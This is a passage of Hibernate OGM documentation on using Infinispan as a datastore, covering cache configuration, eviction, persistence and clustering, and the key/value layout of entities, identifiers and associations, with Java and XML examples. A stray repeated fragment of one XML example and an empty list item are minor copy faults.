approach:\n** `ENTITIES`: is going to be used to store the main attributes of all your entities.\n** `ASSOCIATIONS`: stores the association information representing the links between entities.\n** `IDENTIFIER_STORE`: contains internal metadata that Hibernate OGM needs\n to provide sequences and auto-incremented numbers for primary key generation.\n\nThe preferred strategy is `CACHE_PER_TABLE` as it offers both more fine-grained configuration options\nand the ability to work on specific entities in a simpler fashion.\n\nIn the following paragraphs, we will explain which aspects of Infinispan\nyou're likely to want to reconfigure from their defaults.\nAll attributes and elements from Infinispan which we don't mention are safe to ignore.\nRefer to the http:\/\/infinispan.org\/documentation\/[Infinispan User Guide]\nfor guru-level performance tuning and customizations.\n\nAn Infinispan configuration file is an XML file complying with the Infinispan schema;\nthe basic structure is shown in the following example:\n\n.Simple example of an Infinispan configuration file\n====\n[source, XML]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<infinispan\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"urn:infinispan:config:9.1 http:\/\/www.infinispan.org\/schemas\/infinispan-config-9.1.xsd\"\n xmlns=\"urn:infinispan:config:9.1\">\n\n <cache-container name=\"HibernateOGM\" default-cache=\"DEFAULT\">\n\n <!-- Default cache settings -->\n <local-cache name=\"DEFAULT\">\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <\/local-cache>\n\n <local-cache name=\"User\"\/>\n\n <local-cache name=\"Order\"\/>\n\n <local-cache name=\"associations_User_Order\"\/>\n\n <\/cache-container>\n<\/infinispan>\n----\n====\n\n
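If you want to sanity-check such a configuration file outside of Hibernate OGM, you can boot it directly with Infinispan's programmatic API; Hibernate OGM does the equivalent for you at startup. A minimal sketch, assuming the file above is available on the classpath as `my-infinispan.xml`:\n\n[source, JAVA]\n----\nimport org.infinispan.Cache;\nimport org.infinispan.manager.DefaultCacheManager;\nimport org.infinispan.manager.EmbeddedCacheManager;\n\npublic class ConfigSmokeTest {\n\n    public static void main(String[] args) throws Exception {\n        \/\/ Boot an embedded CacheManager from the XML shown above:\n        EmbeddedCacheManager cacheManager = new DefaultCacheManager( \"my-infinispan.xml\" );\n        try {\n            \/\/ Caches are retrieved by name, e.g. the one backing the User entity:\n            Cache<Object, Object> users = cacheManager.getCache( \"User\" );\n            System.out.println( \"Cache 'User' status: \" + users.getStatus() );\n        }\n        finally {\n            cacheManager.stop();\n        }\n    }\n}\n----\n\n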
There are global settings that can be set before the `cache-container` section.\nThese settings will affect the whole instance;\nmainly of interest for Hibernate OGM users is the `jgroups` element,\nin which we will set JGroups configuration overrides.\n\nInside the `cache-container` section, explicitly named caches and their configurations are defined,\nas well as the default cache (named `DEFAULT` here) if we want to affect all named caches.\nThis is where we will likely want to configure clustering modes, eviction policies and ``CacheStore``s.\n\n[[ogm-infinispan-storage]]\n\n==== Manage data size\n\nIn its default configuration Infinispan stores all data in the heap of the JVM;\nin this barebone mode it is conceptually not very different from using a HashMap:\nthe size of the data should fit in the heap of your VM,\nand stopping\/killing\/crashing your application will lose all data\nwith no way to recover it.\n\nTo store data permanently (out of the JVM memory) a `CacheStore` should be enabled.\nThe Infinispan project provides many `CacheStore` implementations;\na simple one is the http:\/\/infinispan.org\/docs\/stable\/user_guide\/user_guide.html#single_file_store[\"Single File Store\"],\nwhich is able to store data in simple binary files, on any read\/write mounted filesystem;\nyou can find many more implementations to store your data in anything\nfrom JDBC-connected relational databases to other NoSQL engines such as MongoDB and Cassandra,\nor you can even delegate to other Infinispan clusters.\nFinally, implementing a custom `CacheStore` is quite easy.\n\nTo limit the memory consumption of the precious heap space,\nyou can activate a `passivation` or an `eviction` policy.\nAgain, there are several strategies to play with;\nfor now let's just consider that you'll likely need one to avoid running out of memory\nwhen storing too many entries in the bounded JVM memory space.\nOf course you don't need to choose one while experimenting with limited data sizes:\nenabling such a strategy doesn't have any other impact\non the functionality of your Hibernate OGM application\n(other than performance: entries stored in the Infinispan in-memory space\nare accessed much more quickly than from any CacheStore).\n\nA `CacheStore` can be configured as write-through,\ncommitting all changes to the `CacheStore` before returning (and in the same transaction),\nor as write-behind.\nA write-behind configuration is normally not encouraged in storage engines,\nas a failure of the node implies some data might be lost\nwithout receiving any notification about it,\nbut this problem is mitigated in Infinispan because of its capability\nto combine CacheStore write-behind\nwith a synchronous replication to other Infinispan nodes.\n\n.Enabling a FileCacheStore and eviction\n====\n\n\n[source, XML]\n----\n<local-cache name=\"User\">\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <eviction strategy=\"LIRS\" max-entries=\"2000\"\/>\n <persistence passivation=\"true\">\n <file-store\n shared=\"false\"\n path=\"\/var\/infinispan\/myapp\/users\">\n <write-behind flush-lock-timeout=\"15000\" thread-pool-size=\"5\" \/>\n <\/file-store>\n <\/persistence>\n<\/local-cache>\n----\n\n====\n\nIn this example we enabled both `eviction` and a `CacheStore` (the `persistence` element).\n`LIRS` is one of the choices we have for eviction strategies.\nHere it is configured to keep (approximately) 2000 entries in live memory\nand evict the remaining ones as a memory usage control strategy.\n\nThe `CacheStore` is enabling `passivation`,\nwhich means that the entries which are evicted are stored on the filesystem.\n\n[WARNING]\n====\nYou could configure an eviction strategy while not configuring a passivating CacheStore!\nThat is a valid configuration for Infinispan, but it will have the evictor permanently remove entries.\nHibernate OGM will break in such a configuration.\n====\n\n
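The same cache definition can also be expressed with Infinispan's programmatic configuration API, which can be handy in integration tests. The following sketch approximates the XML above; the exact builder methods vary between Infinispan versions, so treat it as an illustration rather than a drop-in replacement:\n\n[source, JAVA]\n----\nimport org.infinispan.configuration.cache.Configuration;\nimport org.infinispan.configuration.cache.ConfigurationBuilder;\nimport org.infinispan.eviction.EvictionStrategy;\n\npublic class UserCacheConfiguration {\n\n    \/\/ Roughly equivalent to the <local-cache name=\"User\"> definition above:\n    public static Configuration build() {\n        return new ConfigurationBuilder()\n            \/\/ keep (approximately) 2000 entries in memory, evict the rest\n            .eviction().strategy( EvictionStrategy.LIRS ).maxEntries( 2000 )\n            \/\/ passivate evicted entries to a single-file store\n            .persistence().passivation( true )\n                .addSingleFileStore()\n                    .shared( false )\n                    .location( \"\/var\/infinispan\/myapp\/users\" )\n                    \/\/ write-behind, as in the XML example\n                    .async().enable()\n            .build();\n    }\n}\n----\n\n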
[[ogm-infinispan-clustering]]\n\n==== Clustering: store data on multiple Infinispan nodes\n\nThe best thing about Infinispan is that all nodes are treated equally\nand it requires almost no up-front capacity planning:\nto add more nodes to the cluster you just have to start new JVMs,\non the same or different physical servers,\nwith the same Infinispan configuration and the same application.\n\nInfinispan supports several clustering _cache modes_;\neach mode provides the same API and functionality\nbut with different performance, scalability and availability options:\n\n.Infinispan cache modes\nlocal::\nUseful for a single VM: the networking stack is disabled\nreplication::\nAll data is replicated to each node;\neach node contains a full copy of all entries.\nConsequently reads are faster, but writes don't scale as well.\nNot suited for very large datasets.\ndistribution::\nEach entry is distributed on multiple nodes for redundancy and failure recovery,\nbut not to all the nodes.\nProvides linear scalability for both write and read operations.\ndistribution is the default mode.\n\nTo use the `replication` or `distribution` cache modes\nInfinispan will use JGroups to discover and connect to the other nodes.\n\nIn the default configuration,\nJGroups will attempt to autodetect peer nodes using a multicast socket;\nthis works out of the box in most network environments\nbut will require some extra configuration in cloud environments\n(which often block multicast packets) or in case of strict firewalls.\nSee the http:\/\/www.jgroups.org\/manual\/html_single\/[JGroups reference documentation],\nand specifically look for _Discovery Protocols_, to customize the detection of peer nodes.\n\nNowadays, the [acronym]`JVM` defaults to using the [acronym]`IPv6` network stack;\nthis will work fine with JGroups, but only if you configured [acronym]`IPv6` correctly.\nIt is often useful to force the [acronym]`JVM` to use [acronym]`IPv4`.\n\nIt is also important to let JGroups know which networking interface you want to use;\nit will bind to one interface by default, but if you have multiple network interfaces\nthat might not be the one you expect.\n\n.JVM properties to set for clustering\n====\n[source]\n----\n#192.168.122.1 is an example IPv4 address\n-Djava.net.preferIPv4Stack=true -Djgroups.bind_addr=192.168.122.1\n----\n====\n\n[NOTE]\n====\nYou don't need to use [acronym]`IPv4`: JGroups is compatible with [acronym]`IPv6`,\nprovided you have routing properly configured and valid addresses assigned.\n\nThe `jgroups.bind_addr` needs to match a placeholder name\nin your JGroups configuration in case you don't use the default one.\n====\n\nThe default configuration uses `distribution` as the cache mode\nand uses the `jgroups-tcp.xml` configuration for JGroups,\nwhich is contained in the Infinispan jar\nas the default configuration for Infinispan users.\nLet's see how to reconfigure this:\n\n.Reconfiguring the cache mode and overriding the JGroups configuration\n====\n[source, XML]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<infinispan\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"urn:infinispan:config:9.1 http:\/\/www.infinispan.org\/schemas\/infinispan-config-9.1.xsd\"\n xmlns=\"urn:infinispan:config:9.1\">\n\n <jgroups>\n <stack-file name=\"custom-stack\" path=\"my-jgroups-conf.xml\" \/>\n <\/jgroups>\n\n <cache-container name=\"HibernateOGM\" default-cache=\"DEFAULT\">\n <transport stack=\"custom-stack\" \/>\n\n <!-- *************************************** -->\n <!-- Default cache used as template -->\n <!-- *************************************** -->\n <distributed-cache name=\"DEFAULT\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <!-- Override the cache mode: -->\n <replicated-cache name=\"User\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/replicated-cache>\n\n <distributed-cache name=\"Order\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <distributed-cache name=\"associations_User_Order\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <\/cache-container>\n\n<\/infinispan>\n----\n====\n\n
name=\"DEFAULT\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <!-- Override the cache mode: -->\n <replicated-cache name=\"User\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/replicated-cache>\n\n <distributed-cache name=\"Order\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <distributed-cache name=\"associations_User_Order\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <\/cache-container>\n\n<\/infinispan>\n----\n====\n\nIn the example above we specify a custom JGroups configuration file\nand set the cache mode for the default cache to `distribution`;\nthis is going to be inherited by the `Order` and the `associations_User_Order` caches.\nBut for `User` we have chosen (for the sake of this example) to use `replication`.\n\nNow that you have clustering configured, start the service on multiple nodes.\nEach node will need the same configuration and jars.\n\n[TIP]\n====\nWe have just shown how to override the clustering mode\nand the networking stack for the sake of completeness, but you don't have to!\n\nStart with the default configuration and see if that fits you.\nYou can fine tune these setting when you are closer to going in production.\n====\n\n[[ogm-infinispan-storage-principles]]\n==== Storage principles\n\nTo describe things simply, each entity is stored under a single key.\nThe value itself is a map containing the columns \/ values pair.\n\nEach association from one entity instance to (a set of) another is stored under a single key.\nThe value contains the navigational information to the (set of) entity.\n\n[[ogm-infinispan-built-in-types]]\n===== Properties and built-in types\n\nEach entity is represented by a map.\nEach property or more precisely column is represented by an entry in this map,\nthe key being the column name.\n\nHibernate OGM support by default the following property types:\n\n* `java.lang.String`\n* `java.lang.Character` (or char primitive)\n* `java.lang.Boolean` (or boolean primitive); Optionally the annotations `@Type(type = \"true_false\")`, `@Type(type = \"yes_no\")` and `@Type(type = \"numeric_boolean\")` can be used to map boolean properties to the characters 'T'\/'F', 'Y'\/'N' or the int values 0\/1, respectively.\n* `java.lang.Byte` (or byte primitive)\n* `java.lang.Short` (or short primitive)\n* `java.lang.Integer` (or integer primitive)\n* `java.lang.Long` (or long primitive)\n* `java.lang.Integer` (or integer primitive)\n* `java.lang.Float` (or float primitive)\n* `java.lang.Double` (or double primitive)\n\n* `java.math.BigDecimal`\n* `java.math.BigInteger`\n\n* `java.util.Calendar`\n* `java.util.Date`\n* `java.util.UUID`\n* 
[NOTE]\n====\nHibernate OGM doesn't store null values in Infinispan:\nsetting a value to null is the same as removing the corresponding entry\nfrom Infinispan.\n\nThis can have consequences when it comes to queries on null values.\n====\n\n===== Identifiers\n\nEntity identifiers are used to build the key under which the entity is stored in the cache.\n\nThe key comprises the following information:\n\n* the identifier column names\n* the identifier column values\n* the entity table (for the `CACHE_PER_KIND` strategy)\n\nIn `CACHE_PER_TABLE`, the table name is inferred from the cache name.\nIn `CACHE_PER_KIND`, the table name is necessary to identify the entity in the generic cache.\n\n.Define an identifier as a primitive type\n====\n[source, JAVA]\n----\n@Entity\npublic class Bookmark {\n\n @Id\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Bookmark` cache in `CACHE_PER_TABLE`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [42] | id | 42 \n | title | \"Hibernate OGM documentation\" \n|===\n\n.Content of the `ENTITIES` cache in `CACHE_PER_KIND`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| \"Bookmark\", [\"id\"], [42] | id | 42 \n | title | \"Hibernate OGM documentation\" \n|===\n====\n\n.Define an identifier using @EmbeddedId\n====\n[source, JAVA]\n----\n@Embeddable\npublic class NewsID implements Serializable {\n\n private String title;\n private String author;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class News {\n\n @EmbeddedId\n private NewsID newsId;\n private String content;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `News` cache in `CACHE_PER_TABLE`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY\n 2+^| MAP ENTRIES\n\n.3+^.^| [newsId.author, newsId.title], [\"Guillaume\", \"How to use Hibernate OGM ?\"]\n | newsId.author | \"Guillaume\"\n\n | newsId.title | \"How to use Hibernate OGM ?\"\n\n | content | \"Simple, just like ORM but with a NoSQL database\"\n|===\n\n.Content of the `ENTITIES` cache in `CACHE_PER_KIND`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY\n 2+^| MAP ENTRIES\n\n.3+^.^| \"News\", [newsId.author, newsId.title], [\"Guillaume\", \"How to use Hibernate OGM ?\"]\n | newsId.author | \"Guillaume\"\n\n | newsId.title | \"How to use Hibernate OGM ?\"\n\n | content | \"Simple, just like ORM but with a NoSQL database\"\n|===\n====\n\n====== Identifier generation strategies\n\nSince Infinispan has no native sequence or identity column support,\nthese are simulated using the table strategy; note, however, that the default values vary.\nWe highly recommend you explicitly use a `TABLE` strategy if you want to generate a monotonic identifier.\n\nBut if you can, use a pure in-memory and scalable strategy like a UUID generator.\n\n.Id generation strategy TABLE using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE)\n private long id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `hibernate_sequences` cache in `CACHE_PER_TABLE`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | [\"sequence_name\"], [\"default\"]\n^.^| 2\n|===\n\n.Content of the `IDENTIFIERS` cache in `CACHE_PER_KIND`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | \"hibernate_sequences\", [\"sequence_name\"], [\"default\"]\n^.^| 2\n|===\n====\n\nAs you can see, in `CACHE_PER_TABLE` the key does not contain the id source table name:\nit is inferred from the name of the cache hosting that key.\n\n
.Id generation strategy TABLE using a custom table\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE, generator = \"guitarGen\")\n @TableGenerator(\n name = \"guitarGen\",\n table = \"GuitarPlayerSequence\",\n pkColumnName = \"seq\",\n pkColumnValue = \"guitarPlayer\"\n )\n private long id;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `GuitarPlayerSequence` cache in `CACHE_PER_TABLE`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | [\"seq\"], [\"guitarPlayer\"]\n^.^| 2\n|===\n\n.Content of the `IDENTIFIERS` cache in `CACHE_PER_KIND`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | \"GuitarPlayerSequence\", [\"seq\"], [\"guitarPlayer\"]\n^.^| 2\n|===\n====\n\n.SEQUENCE id generation strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Song {\n\n @Id\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"songSequenceGenerator\")\n @SequenceGenerator(\n name = \"songSequenceGenerator\",\n sequenceName = \"song_sequence\",\n initialValue = 2,\n allocationSize = 20\n )\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `hibernate_sequences` cache in `CACHE_PER_TABLE`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | [\"sequence_name\"], [\"song_sequence\"]\n^.^| 11\n|===\n\n.Content of the `IDENTIFIERS` cache in `CACHE_PER_KIND`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | \"hibernate_sequences\", [\"sequence_name\"], [\"song_sequence\"]\n^.^| 11\n|===\n====\n\n===== Entities\n\nEntities are stored in the cache named after the entity when using the `CACHE_PER_TABLE` strategy.\nIn the `CACHE_PER_KIND` strategy, entities are stored in a single cache named `ENTITIES`.\n\nThe key comprises the following information:\n\n* the identifier column names\n* the identifier column values\n* the entity table (for the `CACHE_PER_KIND` strategy)\n\nIn `CACHE_PER_TABLE`, the table name is inferred from the cache name.\nIn `CACHE_PER_KIND`, the table name is necessary to identify the entity in the generic cache.\n\nThe entry value is an instance of `org.infinispan.atomic.FineGrainedAtomicMap`,\nwhich contains all the entity properties - or, to be more specific, columns.\nEach column name and value is stored as a key \/ value pair in the map.\nWe use this specialized map as Infinispan is able to transport changes\nin a much more efficient way.\n\n.Default JPA mapping for an entity\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `News` cache in `CACHE_PER_TABLE`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | title | \"On the merits of NoSQL\" \n|===\n\n.Content of the `ENTITIES` cache in `CACHE_PER_KIND`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| \"News\", [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | title | \"On the merits of NoSQL\" \n|===\n====\n\nAs you can see, the table name is not part of the key for `CACHE_PER_TABLE`.\nIn the rest of this section we will no longer show the `CACHE_PER_KIND` strategy.\n\n
.Rename table and column using @Table and @Column\n====\n[source, JAVA]\n----\n@Entity\n@Table(name = \"Article\")\npublic class News {\n\n @Id\n private String id;\n\n @Column(name = \"headline\")\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Article` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | headline | \"On the merits of NoSQL\" \n|===\n====\n\n====== Embedded objects and collections\n\n.Embedded object\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n @Embedded\n private NewsPaper paper;\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class NewsPaper {\n\n private String name;\n private String owner;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `News` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.4+^.^| [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | title | \"On the merits of NoSQL\" \n | paper.name | \"NoSQL journal of prophecies\" \n | paper.owner | \"Delphy\" \n|===\n====\n\n.@ElementCollection with one attribute\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `GrandMother` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n ^.^| [\"id\"], [\"granny\"] | id | \"granny\"\n|===\n\n.Content of the `associations_GrandMother_grandChildren` cache in `CACHE_PER_TABLE`\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.4+^.^| [\"GrandMother_id\"], [\"granny\"]\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Leia\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Leia\"\n\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Luke\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Luke\"\n|===\n\n.Content of the `ASSOCIATIONS` cache in `CACHE_PER_KIND`\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.4+^.^| \"GrandMother_grandChildren\", [\"GrandMother_id\"], [\"granny\"]\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Leia\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Leia\"\n\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Luke\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Luke\"\n|===\n====\n\nHere, we see that the collection of elements is stored in a separate cache and entry.\nThe association key is made of:\n\n* the foreign key column names pointing to the owner of this association\n* the foreign key column values pointing to the owner of this association\n* the association table name in the `CACHE_PER_KIND` approach, where all associations share the same cache\n\nThe association entry is a map containing the representation of each entry in the collection.\nThe keys of that map are made of:\n\n* the names of the columns uniquely identifying that specific collection entry\n (e.g. for a `Set` this is all of the columns)\n* the values of the columns uniquely identifying that specific collection entry\n\n
The value attached to that collection entry key is a map containing the column name \/ column value pairs.\n\n.@ElementCollection with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n @OrderColumn( name = \"birth_order\" )\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `GrandMother` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n ^.^| [\"id\"], [\"granny\"] | id | \"granny\"\n|===\n\n.Content of the `GrandMother_grandChildren` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.6+^.^| [\"GrandMother_id\"], [\"granny\"]\n.3+^.^| [\"GrandMother_id\", \"birth_order\"], [\"granny\", 0]\n | GrandMother_id\n | \"granny\"\n\n | birth_order\n | 0\n\n | name\n | \"Leia\"\n\n.3+^.^| [\"GrandMother_id\", \"birth_order\"], [\"granny\", 1]\n | GrandMother_id\n | \"granny\"\n\n | birth_order\n | 1\n\n | name\n | \"Luke\"\n|===\n====\n\nHere we use an indexed collection: the owning entity id and the index value are enough\nto identify an entry in the collection.\n\n.@ElementCollection with Map of @Embeddable\n====\n[source, JAVA]\n----\n@Entity\npublic class ForumUser {\n\n\t@Id\n\tprivate String name;\n\n\t@ElementCollection\n\tprivate Map<String, JiraIssue> issues = new HashMap<>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class JiraIssue {\n\n\tprivate Integer number;\n\tprivate String project;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `ForumUser` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n ^.^| [\"name\"], [\"Jane Doe\"] | name | \"Jane Doe\"\n|===\n\n.Content of the `ForumUser_issues` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.12+^.^| [\"ForumUser_id\"], [\"Jane Doe\"]\n\n.4+^.^| [\"ForumUser_id\", \"issues_KEY\"], [\"Jane Doe\", \"issueWithNull\"]\n\n | ForumUser_id\n | \"Jane Doe\"\n\n | issues_KEY\n | \"issueWithNull\"\n\n | issues.value.project\n | <null>\n\n | issues.value.number\n | <null>\n\n.4+^.^| [\"ForumUser_id\", \"issues_KEY\"], [\"Jane Doe\", \"issue1\"]\n\n | ForumUser_id\n | \"Jane Doe\"\n\n | issues_KEY\n | \"issue1\"\n\n | issues.value.project\n | \"OGM\"\n\n | issues.value.number\n | 1253\n\n.4+^.^| [\"ForumUser_id\", \"issues_KEY\"], [\"Jane Doe\", \"issue2\"]\n\n | ForumUser_id\n | \"Jane Doe\"\n\n | issues_KEY\n | \"issue2\"\n\n | issues.value.project\n | \"HSEARCH\"\n\n | issues.value.number\n | 2000\n|===\n====\n\n===== Associations\n\nAssociations between entities are mapped like (collections of) embeddables,\nexcept that the target entity is represented by its identifier(s).\n\n\n.Unidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicule {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n private Vehicule vehicule;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Vehicule` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"V_01\"] | id | \"V_01\"\n | brand | \"Mercedes\"\n|===\n\n
\"Mercedes\"\n|===\n\n.Content of the `Wheel` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.3+^.^| [\"id\"], [\"W001\"] | id | \"W001\"\n | diameter | 0.0\n | vehicule_id | \"V_01\"\n|===\n====\n\n[[infinispan-in-entity-one-to-one-join-column]]\n.Unidirectional one-to-one with @JoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicule {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @JoinColumn( name = \"part_of\" )\n private Vehicule vehicule;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Vehicle` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"V_01\"] | id | \"V_01\"\n | brand | \"Mercedes\"\n|===\n\n.Content of the `Wheel` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.3+^.^| \"Wheel\", [\"id\"], [\"W001\"] | id | \"W001\"\n | diameter | 0.0\n | part_of | \"V_01\"\n|===\n====\n\n.Unidirectional one-to-one with @MapsId and @PrimaryKeyJoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicule {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @PrimaryKeyJoinColumn\n @MapsId\n private Vehicule vehicule;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Vehicle` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"V_01\"] | id | \"V_01\"\n | brand | \"Mercedes\"\n|===\n\n.Content of the `Wheel` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP 